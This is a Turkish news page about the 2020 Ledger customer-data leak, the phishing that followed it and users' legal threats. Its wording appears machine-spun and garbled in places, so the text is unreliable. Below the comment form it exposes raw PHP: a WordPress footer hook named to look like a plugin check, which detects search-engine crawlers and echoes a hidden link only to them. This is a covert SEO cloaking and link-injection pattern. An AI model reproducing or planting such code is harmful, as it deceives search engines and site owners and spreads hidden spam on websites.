Sıradaki içerik:

Yerli İHA Anka, Yurt Dışına İhraç Edildi

e
sv

Ledger'dan Siber Saldırı Açıklaması: Basit Bir Hata

25 Aralık 2020 15:32
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Geçtiğimiz günlerde sizlerle paylaştığımız bir haberimizde, kripto paraları borsa dışında toplamak için kullanılan Ledger isimli USB bellekleri geliştiren şirkete bir siber saldırı düzenlendiğinden bahsetmiştik. Bu olay, Ledger kullanıcılarını ciddi anlamda sinirlendirmiş durumda. Bunun nedeniyse aynı bilgisayar korsanı olduğuna inanılan kişinin, temmuz ayında yine benzer bir saldırı düzenlemiş olmasıydı. Kullanıcılar, kripto para cüzdanı geliştiren şirketi, yaşanan olayları önemsememekle suçluyorlar.

Yaşanan hadise nedeniyle yasal süreç başlatılacağının konuşulması üzerine harekete geçen Ledger yetkilileri, konuyla ilgili bir açıklama yapmak durumunda kaldılar. Yaşanan saldırının kripto paraların güvenliğiyle ilgisinin olmadığını belirten yetkililer, olayın sadece e-posta adresleriyle ilgili olduğunu beyan ettiler. Ancak Ledger kullanıcıları, yapılan açıklamaları bir türlü kabullenmek istemiyorlar gibi görünüyorlar.

270 binden kullanıcının bilgilerine sebep olan şey, kolay bir hataymış

Ledger

Ledger CEO'su Pascal Gauthier tarafından yapılan açıklamalara göre yaşanan emniyet ihlalinin nedeni kolay bir API hatası. CEO'ya göre veritabanındaki verileri aktarmaya yarayan bir API'nin olmaması yerde kodlanmış olması, kullanıcıların kişisel bilgilerinin ele geçirilmesine yol açtı. Bunun bir hata olduğunu kabul eden Gauthier, kasıtlı bir hal olmadığını söyledi. Bazı siber emniyet uzmanları ise Ledger'in şifreleme uygulamalarının yeteri kadar güvenli olmadığını ifade ediyorlar.

Yapılan kurumsal bir açıklamada ise gelecekte böyle bir şey olmaması için ellerinden geleni yaptıklarını belirten Ledger yetkilileri, konuyla ilgili bazı tedbirler aldıklarını ve almaya da devam ettiklerini anlatım ediyorlar. Kullanıcı bilgilerinin ortaya çıkmasına enlem olarak başlayan kimlik avı saldırıları için de harekete geçtiklerini belirten yetkililer, konuyla ilgili bir internet sitesi oluşturup, kimlik avı saldırılarını bu site üzerinden paylaşacaklarını anlatım ediyorlar. Söz konusu internet sitesinin yakından takip edilmesi gerektiğini söyleyen şirket, kullanıcılara yönelik sitede yeni kimlik avı saldırılarının rapor edilebileceğini vurguluyorlar.

Ledger

Şirket, yaşanan olaylarla ilgili olarak elinden geleni yaptığını söylüyor olsa da kullanıcılar böyle düşünmüyor. Hem kişisel bilgileri ortaya çıkan hem de ortaya çıkan bilgiler nedeniyle kimlik avı saldırılarına maruz kalan kullanıcılar, şirketi yasal süreç başlatma tehdit ediyorlar. Avrupa Birliği yasalarına tabi olan şirket, birlik kanunlarına göre toplu davalarla karşı karşıya kalabilir. Anlaşılan o ki Ledger'ı, oldukça zorlu bir süreç bekliyor.

Kaynak : https://cointelegraph.com/news/ledger-data-leak-a-simple-mistake-exposed-270k-crypto-wallet-buyers

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');